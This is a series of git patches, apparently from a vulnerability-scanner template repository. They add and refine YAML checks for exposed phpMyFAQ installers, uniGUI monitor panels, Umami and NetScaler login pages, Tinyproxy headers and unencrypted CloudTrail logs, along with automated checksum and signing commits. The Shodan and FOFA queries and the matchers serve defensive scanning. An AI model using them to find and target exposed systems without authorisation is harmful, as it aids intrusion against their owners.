00:00:00 2001 From: Brandon Hutchinson Date: Thu, 9 May 2024 17:55:17 +0000 Subject: [PATCH 0745/1768] Create tinyproxy-detect.yaml --- http/technologies/tinyproxy-detect.yaml | 31 +++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/technologies/tinyproxy-detect.yaml diff --git a/http/technologies/tinyproxy-detect.yaml b/http/technologies/tinyproxy-detect.yaml new file mode 100644 index 0000000000..6b548e1767 --- /dev/null +++ b/http/technologies/tinyproxy-detect.yaml @@ -0,0 +1,31 @@ +id: tinyproxy-detect + +info: + name: Tinyproxy detect + author: bhutch + severity: info + description: Lightweight HTTP/HTTPS proxy daemon for POSIX operating systems + reference: + - https://github.com/tinyproxy/tinyproxy + metadata: + verified: true + max-request: 1 + shodan-query: "Server: tinyproxy" + tags: tech,proxy + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - "server: tinyproxy" + case-insensitive: true + + extractors: + - type: kval + kval: + - server From f2fa65385e1f348c3548842ef2358d429e5792b1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 May 2024 09:50:23 +0530 Subject: [PATCH 0746/1768] Update cloudtrail-logs-not-encrypted.yaml --- .../cloudtrail/cloudtrail-logs-not-encrypted.yaml | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml index 77d0213470..4fc82d8c28 100644 --- a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml @@ -20,6 +20,7 @@ flow: | code(1) for(let CloudTrail of iterate(template.cloudtrailname)){ set("trail", CloudTrail) + set("region", CloudTrail.trailregion) code(2) } @@ -29,14 +30,20 @@ code: - sh - bash source: | - aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json + aws cloudtrail list-trails --region $region --query 'Trails[*].[Name, HomeRegion]' --output json extractors: - type: json name: cloudtrailname internal: true json: - - '.[]' + - '.[] | .[0]' + + - type: json + name: trailregion + internal: true + json: + - '.[] | .[1]' - engine: - sh @@ -52,5 +59,5 @@ code: extractors: - type: dsl dsl: - - '"CloudTrail trail" + trail + " is not configured to encrypt log files using SSE-KMS encryption"' -# digest: 490a004630440220615ff60f92dc1540ae499c543e657c18d430e7b6b08291befb395d465b0dfa280220748efe3b2771beb250f0c50040e94c8c0a9a37f60fcb6c88bbe9ff55b5362fa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '"CloudTrail trail " + trail + " is not configured to encrypt log files using SSE-KMS encryption"' +# digest: 490a004630440220615ff60f92dc1540ae499c543e657c18d430e7b6b08291befb395d465b0dfa280220748efe3b2771beb250f0c50040e94c8c0a9a37f60fcb6c88bbe9ff55b5362fa1:922c64590222798bb761d5b6d8e72950 From e3cbcc72ae1ca6e8feb8ad35e164bbad87d0d321 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 10 May 2024 12:05:20 +0530 Subject: [PATCH 0747/1768] Create phpmyfaq-installer.yaml --- .../installer/phpmyfaq-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/phpmyfaq-installer.yaml diff --git a/http/misconfiguration/installer/phpmyfaq-installer.yaml b/http/misconfiguration/installer/phpmyfaq-installer.yaml new file mode 100644 index 0000000000..c8201f32b1 --- /dev/null +++ b/http/misconfiguration/installer/phpmyfaq-installer.yaml @@ -0,0 +1,31 @@ +id: phpmyfaq-installer + +info: + name: phpMyFAQ Installation - Exposure + author: ritikchaddha + severity: high + description: phpMyFAQ installation is exposed. + metadata: + verified: true + max-request: 1 + fofa-query: "phpMyFAQ-setup" + tags: misconfig,phpmyfaq,install + +http: + - method: GET + path: + - "{{BaseURL}}/setup/index.php" + + matchers-condition: or + matchers: + - type: word + part: body + words: + - 'phpMyFAQ' + - 'Setup' + condition: and + + - type: word + part: header + words: + - 'phpmyfaq-setup' From 6e1d973c9b955088bd72909e37c6c5377a637297 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 10 May 2024 12:31:34 +0530 Subject: [PATCH 0748/1768] Update tinyproxy-detect.yaml --- http/technologies/tinyproxy-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/technologies/tinyproxy-detect.yaml b/http/technologies/tinyproxy-detect.yaml index 6b548e1767..df2615fa99 100644 --- a/http/technologies/tinyproxy-detect.yaml +++ b/http/technologies/tinyproxy-detect.yaml @@ -1,7 +1,7 @@ id: tinyproxy-detect info: - name: Tinyproxy detect + name: Tinyproxy - Detect author: bhutch severity: info description: Lightweight HTTP/HTTPS proxy daemon for POSIX operating systems @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: "Server: tinyproxy" - tags: tech,proxy + tags: tech,proxy,detect http: - method: GET From 39e09a8a5bd0a552847867d5a06d0dd8cae35dae Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 10 May 2024 12:33:40 +0530 Subject: [PATCH 0749/1768] Update netscaler-aaa-login.yaml --- http/exposed-panels/netscaler-aaa-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/netscaler-aaa-login.yaml b/http/exposed-panels/netscaler-aaa-login.yaml index 84b95058b4..f9a0df87fa 100644 --- a/http/exposed-panels/netscaler-aaa-login.yaml +++ b/http/exposed-panels/netscaler-aaa-login.yaml @@ -15,7 +15,7 @@ info: max-request: 1 product: netscaler vendor: citrix - tags: panel,netscaler,login,edb,citrix + tags: panel,netscaler,login,edb,citrix,detect http: - method: GET From 3aeb0e2403745efeda6e6d026ac438577daf2910 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 07:18:45 +0000 Subject: [PATCH 0751/1768] Auto Generated Templates Checksum [Fri May 10 07:18:45 UTC 2024] :robot: --- templates-checksum.txt | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 894d39cb30..9b80322de0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3274,7 +3274,7 @@ http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730 -http/cves/2024/CVE-2024-31848.yaml:9af993dd7348e9e7863df89ef4f77c8458ad6147 +http/cves/2024/CVE-2024-31848.yaml:0d6172ae416d3a1de4e4cabcccdb4e102f2ca440 http/cves/2024/CVE-2024-31849.yaml:38ee32ca8fe1a5378feb218852477eb6460e62ea http/cves/2024/CVE-2024-31850.yaml:e6fdbf6bb6829c0afd6fa7027b68b859f301d1ba http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf @@ -4085,7 +4085,7 @@ http/exposed-panels/netgear-version-detect.yaml:1f15ea1787f6da7ace19e6d13e2ea8d3 http/exposed-panels/netis-router.yaml:37a842ce9b050b0adf42caa1683e033cf9f3cf27 http/exposed-panels/netlify-cms.yaml:52f77df2c632a0b49af6f01e67f69347308dc73a http/exposed-panels/netris-dashboard-panel.yaml:53082539f3e6021174c2d0c07a47c947ca431659 -http/exposed-panels/netscaler-aaa-login.yaml:cb406a8b3564ac9c8ef51aefb7a59b62040fc8de +http/exposed-panels/netscaler-aaa-login.yaml:c9e869ad937515bec6f7fd19efb782be121f508e http/exposed-panels/netscaler-gateway.yaml:5c1eba07db0920fce2faf0765af99d6e835f6571 http/exposed-panels/netsparker-panel.yaml:bda43642097cc23a68a06f87ff9e42f7b5c38486 http/exposed-panels/netsus-server-login.yaml:7458b5c53ddd54f88b9140e893828568fd7f5c85 @@ -5335,7 +5335,7 @@ http/misconfiguration/haproxy-status.yaml:cd67a127bba5cbe7592fcddf3f9e4abe9ffccb http/misconfiguration/healthchecks-ui-exposure.yaml:5880a258da373e69f620756492fe363c88305114 http/misconfiguration/helm-dashboard-exposure.yaml:5d973ff4a1915a7fbbf754b9f5b3fc68146d07b9 http/misconfiguration/hfs-exposure.yaml:c274f6bce61713807f3886d7e4d3a6b58a8b5d74 -http/misconfiguration/hikivision-env.yaml:36e1e58bdcadd6cb6d52b7929a57989aa2b0d98f +http/misconfiguration/hikvision-env.yaml:a6af8cc4bdf077654c1ca5091b987c3d081e4c32 http/misconfiguration/hivequeue-agent.yaml:df621ff4d3dbb3ea3e652c99fbea133eca2d3192 http/misconfiguration/hp/unauthorized-hp-printer.yaml:960dd267c9ce3fe43452ea0d5e30fdb4cc1430be http/misconfiguration/hp/unauthorized-printer-hp.yaml:69f3ee3a5ae28923c962d7e2b23a0deb5e824611 @@ -7448,7 +7448,7 @@ http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml:603bb5279bc4d http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml:ea1ab53653cf1c170515c6ee5e6867b76f167b01 http/vulnerabilities/cisco/cisco-webex-log4j-rce.yaml:aef89b607f0527340246a54d607fb5a0c4533d5e http/vulnerabilities/cisco/cucm-username-enumeration.yaml:8f1f34c21c46c88b1faf80e11363097dc18d7c03 -http/vulnerabilities/citrix/citrix-oob-memory-read.yaml:b31d091364cfce9c3384b7db96cf236992d044f4 +http/vulnerabilities/citrix/citrix-oob-memory-read.yaml:7866f3668d1f681eff787a1c2b9146a491251e11 http/vulnerabilities/code42/code42-log4j-rce.yaml:c6eca1ad5491f3ab51671acd9067242f3f77767e http/vulnerabilities/concrete/concrete-xss.yaml:85b12fb54e5f98736f4bc70df764384fe675f2f2 http/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml:305c4b65dec3bc65e31fcd5c0b72a9841e630064 @@ -8498,7 +8498,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:435e6048b63deb8509219645aafa7043cc65537c +templates-checksum.txt:4a1a4fcc08b86952211e59430aeefda29f66c75e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3fe45cfd32ee539b15f38948f9cefb431238b068 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 07:20:29 +0000 Subject: [PATCH 0752/1768] Auto Template Signing [Fri May 10 07:20:29 UTC 2024] :robot: --- http/exposed-panels/netscaler-aaa-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/netscaler-aaa-login.yaml b/http/exposed-panels/netscaler-aaa-login.yaml index f9a0df87fa..7d995d74b9 100644 --- a/http/exposed-panels/netscaler-aaa-login.yaml +++ b/http/exposed-panels/netscaler-aaa-login.yaml @@ -28,3 +28,4 @@ http: - "NetScaler AAA" - "_ctxstxt_NetscalerAAA" condition: or +# digest: 4b0a00483046022100fc8390a0699abae759299064c59fc5ac4a3e0fda101ec74ba62d8362437ea339022100a02a6c73d54ef2e5655e15c3526ff0d9e2c91abbc96e47cf045c71e19c51618a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d6fec33ee9a830fe0ad013bcb2a4b5de400ec7ee Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 10 May 2024 13:56:12 +0530 Subject: [PATCH 0754/1768] updated matchers --- unigui-server-monitor-exposure.yaml | 37 +++++++++++++++-------------- 1 file changed, 19 insertions(+), 18 deletions(-) diff --git a/unigui-server-monitor-exposure.yaml b/unigui-server-monitor-exposure.yaml index bd43afad2f..922ef2f2aa 100644 --- a/unigui-server-monitor-exposure.yaml +++ b/unigui-server-monitor-exposure.yaml @@ -1,34 +1,35 @@ id: unigui-server-monitor-exposure info: - name: UniGUI Server Monitor Panel Exposure + name: UniGUI Server Monitor Panel - Exposure author: serrapa - severity: medium - description: Detects exposed UniGUI Server Monitor Panels which could reveal sensitive server statistics, users sessions, licensing information and others data. + severity: low + description: | + Detects exposed UniGUI Server Monitor Panels which could reveal sensitive server statistics, users sessions, licensing information and others data. reference: - https://www.unigui.com/doc/online_help/using-server-monitor-(server-c.htm - tags: exposure,unigui + metadata: + verified: true + max-request: 1 + shodan-query: title:"uniGUI" + fofa-query: title="uniGUI" + tags: exposure,unigui,misconfig -requests: +http: - method: GET path: - "{{BaseURL}}/server" matchers-condition: and matchers: - - type: word - words: - - "uniGUI Standalone Server" - - "uniGUI License Information" - - "Server Statistics" - part: body - - - type: status - status: - - 200 + - type: dsl + dsl: + - 'contains_any(body, "uniGUI Standalone Server", "uniGUI License Information", "Server Statistics")' + - 'status_code == 200' + condition: and - type: dsl dsl: - - "contains(body, 'layout:\"fit\",title:\"uniGUI Standalone Server\"')" - - "contains(body, 'layout:\"absolute\",title:\"Server Statistics\"')" - + - 'contains(body, "layout:\"fit\",title:\"uniGUI Standalone Server\"")' + - 'contains(body, "layout:\"absolute\",title:\"Server Statistics\"")' + condition: or From 05ab08866593b642a51b268e7fa9f6462c86dc5e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 08:26:15 +0000 Subject: [PATCH 0755/1768] Auto Generated Templates Checksum [Fri May 10 08:26:15 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9b80322de0..1dc13e232b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4085,7 +4085,7 @@ http/exposed-panels/netgear-version-detect.yaml:1f15ea1787f6da7ace19e6d13e2ea8d3 http/exposed-panels/netis-router.yaml:37a842ce9b050b0adf42caa1683e033cf9f3cf27 http/exposed-panels/netlify-cms.yaml:52f77df2c632a0b49af6f01e67f69347308dc73a http/exposed-panels/netris-dashboard-panel.yaml:53082539f3e6021174c2d0c07a47c947ca431659 -http/exposed-panels/netscaler-aaa-login.yaml:c9e869ad937515bec6f7fd19efb782be121f508e +http/exposed-panels/netscaler-aaa-login.yaml:54b265bd78107b40ff7b88241e4f5b4e3ec2b6c5 http/exposed-panels/netscaler-gateway.yaml:5c1eba07db0920fce2faf0765af99d6e835f6571 http/exposed-panels/netsparker-panel.yaml:bda43642097cc23a68a06f87ff9e42f7b5c38486 http/exposed-panels/netsus-server-login.yaml:7458b5c53ddd54f88b9140e893828568fd7f5c85 @@ -8395,7 +8395,7 @@ network/detection/totemomail-smtp-detect.yaml:fef66d409db7afc6efd33ddcae751cd3a7 network/detection/vmware-authentication-daemon-detect.yaml:fe32f8021fd370465c0f97fff15ea59eb34e42fd network/detection/vnc-service-detect.yaml:22f648aa53fa7fb08f258bcd06fa4b15d80eebca network/detection/weblogic-iiop-detect.yaml:05bf3f6fdfa938cfb88ee0e5f27da5e1b8d70bfa -network/detection/weblogic-t3-detect.yaml:06f88de334b8bae8279d944c0cf4467919930e93 +network/detection/weblogic-t3-detect.yaml:d3dc1f10137723bfd082bce409d2bf11ab1cbcc5 network/detection/wing-ftp-detect.yaml:79fe3254d4657278f122977cda7145287f7b993c network/detection/ws_ftp-ssh-detect.yaml:558ac2fd876a7239ddfd7c5c9433769f166644bd network/detection/xlight-ftp-service-detect.yaml:c1bcbafb4cd2ad7a5b4b6c7b947779ee08367781 @@ -8498,7 +8498,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4a1a4fcc08b86952211e59430aeefda29f66c75e +templates-checksum.txt:7fe510f2b3d443f5dfc758fdda968aa2cd19f6f2 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4e789d37e9c9364fea197e3a090fbb100fc4f87a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 08:27:55 +0000 Subject: [PATCH 0756/1768] Auto Template Signing [Fri May 10 08:27:55 UTC 2024] :robot: --- network/detection/weblogic-t3-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/network/detection/weblogic-t3-detect.yaml b/network/detection/weblogic-t3-detect.yaml index b1035ceb2a..918e7fe59f 100644 --- a/network/detection/weblogic-t3-detect.yaml +++ b/network/detection/weblogic-t3-detect.yaml @@ -50,3 +50,4 @@ tcp: group: 1 regex: - "HELO:(.*).false" +# digest: 4a0a00473045022100facd45545006bc9f15dfbf5927e636142e1983912edf41f16247c32732bde2570220480584b7a2efa59dd5d643adefc5cb750e10c155f054ca2bcde4de68a97cbd64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 626141000220a244be1eb4fd713767b8b88f1cad Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 10 May 2024 14:17:49 +0530 Subject: [PATCH 0757/1768] fixed false-negatives --- http/exposed-panels/umami-panel.yaml | 21 +++++++++++++-------- 1 file changed, 13 insertions(+), 8 deletions(-) diff --git a/http/exposed-panels/umami-panel.yaml b/http/exposed-panels/umami-panel.yaml index e20ed8e61d..d26a8a8a86 100644 --- a/http/exposed-panels/umami-panel.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -1,27 +1,32 @@ id: umami-panel info: - name: Umami Panel + name: Umami Panel - Detect author: userdehghani severity: info metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-130447705 - verified: true - tags: panel,umami,login + tags: panel,umami,login,detect http: - method: GET path: - "{{BaseURL}}/login" + - "{{BaseURL}}/favicon.ico" - matchers-condition: and + stop-at-first-match: true + matchers-condition: or matchers: - type: word part: body words: - - 'Login | umami' + - 'Login | umami' + - 'umami
' + condition: or + case-insensitive: true - - type: status - status: - - 200 + - type: dsl + dsl: + - "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))" From cc000e9cdcd563a251701858017ae0f59e803102 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 10 May 2024 08:53:27 +0000 Subject: [PATCH 0758/1768] Auto Generated New Template Addition List [Fri May 10 08:53:27 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d241aa85b6..ed15c7d37d 100644 --- a/.new-additions +++ b/.new-additions @@ -51,6 +51,7 @@ http/exposed-panels/monitorr-panel.yaml http/exposed-panels/openwebui-panel.yaml http/exposed-panels/teamforge-panel.yaml http/exposed-panels/tixeo-panel.yaml +http/exposed-panels/umami-panel.yaml http/misconfiguration/installer/eyoucms-installer.yaml http/misconfiguration/installer/sabnzbd-installer.yaml http/misconfiguration/microsoft/ms-exchange-local-domain.yaml From d147e83706661c1847bf6a914787cd5a29d7ad61 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 08:53:36 +0000 Subject: [PATCH 0759/1768] Auto Generated Templates Checksum [Fri May 10 08:53:36 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1dc13e232b..b6ce096abf 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4438,6 +4438,7 @@ http/exposed-panels/turnkey-openvpn.yaml:39c452eb93078b6a3c5c3b7f7789fba65fb9dbf http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767 http/exposed-panels/typo3-login.yaml:72cfd4ea09b641aada781d8217ae54a23b88a0cd http/exposed-panels/uipath-orchestrator-panel.yaml:af4705f7f98e419ceddff8130581d58ce6028339 +http/exposed-panels/umami-panel.yaml:18b222a00025be7c5fc48af062e14c96107cba85 http/exposed-panels/umbraco-login.yaml:fdfd46a20aa2721ffa8784101d3b1b69f2393ea7 http/exposed-panels/unauth/tautulli-unauth.yaml:091217f1b5773c345e63401e05aa540485af4672 http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656cb6081b84a @@ -8395,7 +8396,7 @@ network/detection/totemomail-smtp-detect.yaml:fef66d409db7afc6efd33ddcae751cd3a7 network/detection/vmware-authentication-daemon-detect.yaml:fe32f8021fd370465c0f97fff15ea59eb34e42fd network/detection/vnc-service-detect.yaml:22f648aa53fa7fb08f258bcd06fa4b15d80eebca network/detection/weblogic-iiop-detect.yaml:05bf3f6fdfa938cfb88ee0e5f27da5e1b8d70bfa -network/detection/weblogic-t3-detect.yaml:d3dc1f10137723bfd082bce409d2bf11ab1cbcc5 +network/detection/weblogic-t3-detect.yaml:d9f9d79b5176d8eb2abd9bf4de3ce84a0220fd99 network/detection/wing-ftp-detect.yaml:79fe3254d4657278f122977cda7145287f7b993c network/detection/ws_ftp-ssh-detect.yaml:558ac2fd876a7239ddfd7c5c9433769f166644bd network/detection/xlight-ftp-service-detect.yaml:c1bcbafb4cd2ad7a5b4b6c7b947779ee08367781 @@ -8498,7 +8499,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7fe510f2b3d443f5dfc758fdda968aa2cd19f6f2 +templates-checksum.txt:55ebadcb226869a8c75f50d00edb88bbb83f9742 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 31a6972fe78d2bf21f58e1465fc8dc5bd54c7a8a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 10 May 2024 08:54:07 +0000 Subject: [PATCH 0760/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3875340387..11e44b532c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -56,6 +56,7 @@ on: - 'http/exposed-panels/openwebui-panel.yaml' - 'http/exposed-panels/teamforge-panel.yaml' - 'http/exposed-panels/tixeo-panel.yaml' + - 'http/exposed-panels/umami-panel.yaml' - 'http/misconfiguration/installer/eyoucms-installer.yaml' - 'http/misconfiguration/installer/sabnzbd-installer.yaml' - 'http/misconfiguration/microsoft/ms-exchange-local-domain.yaml' From 3368997d0e264a7fb4d18556dc8c0ef87ef96d9f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 08:55:17 +0000 Subject: [PATCH 0761/1768] Auto Template Signing [Fri May 10 08:55:16 UTC 2024] :robot: --- http/exposed-panels/umami-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/umami-panel.yaml b/http/exposed-panels/umami-panel.yaml index d26a8a8a86..0384dd6d83 100644 --- a/http/exposed-panels/umami-panel.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -30,3 +30,4 @@ http: - type: dsl dsl: - "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))" +# digest: 4a0a004730450220172b896da3d6bd42b77029a5548cba1ea8a4852ecadc712d6e3f2a7d6b35dcfd022100886497be5d4a19d2cb6c879e61fbb41280e2c9be3e88233da54f4e621a9a4739:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5c6e2df3c8e6688664d1c08648f66b4479f6377b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 09:03:07 +0000 Subject: [PATCH 0763/1768] Auto Generated Templates Checksum [Fri May 10 09:03:07 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b6ce096abf..794f742137 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4438,7 +4438,7 @@ http/exposed-panels/turnkey-openvpn.yaml:39c452eb93078b6a3c5c3b7f7789fba65fb9dbf http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767 http/exposed-panels/typo3-login.yaml:72cfd4ea09b641aada781d8217ae54a23b88a0cd http/exposed-panels/uipath-orchestrator-panel.yaml:af4705f7f98e419ceddff8130581d58ce6028339 -http/exposed-panels/umami-panel.yaml:18b222a00025be7c5fc48af062e14c96107cba85 +http/exposed-panels/umami-panel.yaml:afab83e5265cf3d604e9153445924e90e87483de http/exposed-panels/umbraco-login.yaml:fdfd46a20aa2721ffa8784101d3b1b69f2393ea7 http/exposed-panels/unauth/tautulli-unauth.yaml:091217f1b5773c345e63401e05aa540485af4672 http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656cb6081b84a @@ -5342,7 +5342,7 @@ http/misconfiguration/hp/unauthorized-hp-printer.yaml:960dd267c9ce3fe43452ea0d5e http/misconfiguration/hp/unauthorized-printer-hp.yaml:69f3ee3a5ae28923c962d7e2b23a0deb5e824611 http/misconfiguration/hpe-system-management-anonymous.yaml:82910902ebfef5f84f465fa13c5dcbd83572426a http/misconfiguration/http-missing-security-headers.yaml:62e00bd5126dbd778c766aa3bb0bd1f2fc546006 -http/misconfiguration/https-to-http-redirect.yaml:9c60308f5bfe2dfc11ff9e1682bf68d0b204b3f5 +http/misconfiguration/https-to-http-redirect.yaml:a05bd46e0de9832515105802a679ed46f6af687b http/misconfiguration/ibm-friendly-path-exposure.yaml:77e6c72a9cae1a9b0a6afd79b159b08db996e463 http/misconfiguration/ibm-websphere-xml.yaml:659d65c9f64e0b6ce45ec519419cdfaf9cb77fd1 http/misconfiguration/installer/acunetix-360-installer.yaml:13688236245b336b6a74b5b2ddce35d2e35f6421 @@ -6683,7 +6683,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872 http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:20226a4707ea3e5d8e45845ff2ab3a2069fde0ff +http/technologies/favicon-detect.yaml:add7609902cf4ff52e54789877b8860c4f4c6afe http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 @@ -8499,7 +8499,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:55ebadcb226869a8c75f50d00edb88bbb83f9742 +templates-checksum.txt:e8c5c4d64ae270c6b4d3f298c40eb7b95600371e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From fc57c4d125e895f380a005a34c7f8b8bacffabc0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 09:04:51 +0000 Subject: [PATCH 0764/1768] Auto Template Signing [Fri May 10 09:04:51 UTC 2024] :robot: --- http/misconfiguration/https-to-http-redirect.yaml | 2 +- http/technologies/favicon-detect.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/https-to-http-redirect.yaml b/http/misconfiguration/https-to-http-redirect.yaml index b3ff8b6c71..5419f82670 100644 --- a/http/misconfiguration/https-to-http-redirect.yaml +++ b/http/misconfiguration/https-to-http-redirect.yaml @@ -31,4 +31,4 @@ http: - 'status_code == 200' - 'contains(tolower(body), " Date: Fri, 10 May 2024 12:30:27 +0300 Subject: [PATCH 0765/1768] Added/Update Blind SQL --- http/cves/2022/CVE-2022-22897.yaml | 37 ++++++++++++++++++++++++------ http/cves/2023/CVE-2023-46347.yaml | 8 +++++++ 2 files changed, 38 insertions(+), 7 deletions(-) diff --git 